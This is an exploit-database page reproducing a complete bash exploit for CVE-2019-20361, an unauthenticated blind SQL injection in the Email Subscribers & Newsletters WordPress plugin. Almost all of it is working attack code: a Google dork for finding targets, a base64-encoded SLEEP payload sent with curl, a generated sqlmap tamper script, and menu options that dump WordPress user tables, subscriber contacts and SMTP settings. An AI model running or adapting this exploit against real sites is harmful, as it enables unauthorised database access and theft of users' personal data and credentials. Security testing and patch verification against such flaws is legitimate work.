Advertisement






WordPress Plugin Email Subscribers & Newsletters 4.2.2 hash SQL Injection (Unauthenticated)

CVE Category Price Severity
CVE-2019-20361 CWE-89 $500 High
Author Risk Exploitation Type Date
Mufaddal Masalawala High Remote 2020-07-27
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070134

Below is a copy:

WordPress Plugin Email Subscribers & Newsletters 4.2.2 hash SQL Injection (Unauthenticated)
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBAZ@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: < 4.3.3
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-20361
# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361

main () {
header
if [ "$#" -ne 1 ]; then
echo "Usage: bash CVE-2019-20361.sh [BASE URL]"
echo "Example: bash CVE-2019-20361.sh http://127.0.0.1/"
exit
fi

url=$1
echo ' Target URL : ' "$url"
echo ' Generating sqlmap tamper script in /tmp'
gen_sqlmap_tamper
sqlmap_cmd="sqlmap -u ${url}?es=open&hash=* --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3"
echo ' SQLMap base command : ' "$sqlmap_cmd"

while true
do
 sleep 1
 echo ''
 echo " Possible choices: " 
 echo ''
 echo "  0) Exit"
 echo "  1) Simple vulnerability test SLEEP(5)" 
 echo "  2) Vulnerability test with SQLMap "
 echo "  3) Get WP users data"
 echo "  4) Get subscribers information" 
 echo "  5) Get 'Simple WP SMTP' settings"
 echo ''
 echo -n ' Choice number => '
 read n

 case $n in 
 0) exit ;;
 1) echo 'Testing SLEEP(5)...'
 { time (curl -i -s -k ${url}'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" || echo ' [-] Not vulnerable' ;; 
 2) $sqlmap_cmd ;;
 3) $sqlmap_cmd -T wp_users,wp_usermeta --dump ;;
 4) $sqlmap_cmd -T wp_ig_contacts --dump ;;
 5) $sqlmap_cmd --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;;
 *) echo "Invalid option" ;;
  esac 
done

}

header () {

echo ''
echo ' ################################################################################################';
echo ' #             ___         ___         ___         ___      ___                                 #';
echo ' #            /\  \       /\  \       /\  \       /\  \    /\  \        ___                     #';
echo ' #           /::\  \     /::\  \     /::\  \     /::\  \   \:\  \      /\  \                    #';
echo ' #          /:/\ \  \   /:/\:\  \   /:/\:\  \   /:/\:\  \   \:\  \     \:\  \                   #';
echo ' #         _\:\~\ \  \ /:/  \:\  \ /:/  \:\  \ /::\~\:\  \  /::\  \    /::\__\                  #';
echo ' #        /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/                  #';
echo ' #        \:\ \:\ \/__\:\  \ /:/  \:\  /\ \/__\:\~\:\ \/__/:/  \/__/\/:/  /                     #';
echo ' #         \:\ \:\__\  \:\  /:/  / \:\ \:\__\  \:\ \:\__\/:/  /    \::/__/                      #';
echo ' #          \:\/:/  /   \:\/:/  /   \:\/:/  /   \:\ \/__/\/__/      \:\__\                      #';
echo ' #           \::/  /     \::/  /     \::/  /     \:\__\              \/__/                      #';
echo ' #            \/__/       \/__/       \/__/       \/__/                                         #';
echo ' #                                                 ___         ___         ___         ___      #';
echo ' #                                                /\  \       /\  \       /\  \       /\  \     #';
echo ' #                                               /::\  \     /::\  \     /::\  \     /::\  \    #';
echo ' #                EXPLOIT                       /:/\:\  \   /:/\ \  \   /:/\:\  \   /:/\:\  \   #';
echo ' # Email Subscribers & Newsletters < 4.3.1     /::\~\:\  \ _\:\~\ \  \ /::\~\:\  \ /:/  \:\  \  #';
echo ' #   Unauthenticated Blind SQL Injection      /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #';
echo ' #                                            \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\  \  \/__/ #';
echo ' #                                             \:\ \:\__\  \:\ \:\__\  \:\ \:\__\  \:\  \       #';
echo ' #                                              \:\ \/__/   \:\/:/  /   \:\ \/__/   \:\  \      #';
echo ' #                                               \:\__\      \::/  /     \:\__\      \:\__\     #';
echo ' #                                    KBAZ        \/__/       \/__/       \/__/       \/__/     #';
echo ' #                                                                                              #';
echo ' #                                                                                              #';
echo ' ################################################################################################';
echo ''
}

raw_commands () {

echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100"  '","email":"[email protected]","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' |  base64 -w 0

{ time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo '[+] Vulnerable' || echo '[-] Not vulnerable'

sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3

-T wp_users,wp_usermeta --dump 
-T wp_ig_contacts --dump
--sql-query 'select * from wp_options where option_name="swpsmtp_options"'

}

gen_sqlmap_tamper () {

touch /tmp/__init__.py

cat << _END > /tmp/tamper_CVE-2019-1356989.py
#!/usr/bin/env python

import base64
import urllib

def tamper(payload, **kwargs):

#{"message_id":"100","campaign_id":"100","contact_id":"100","email":"[email protected]","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}
#INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866'

param  = '{"contact_id":"'
param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100"
param += '","campaign_id":"100","message_id":"100","email":"[email protected]","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}'

#print(param%payload)
return base64.encodestring( (param%payload).encode('utf-8') ).decode('utf-8').replace('\n', '')
_END
}

main $@

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum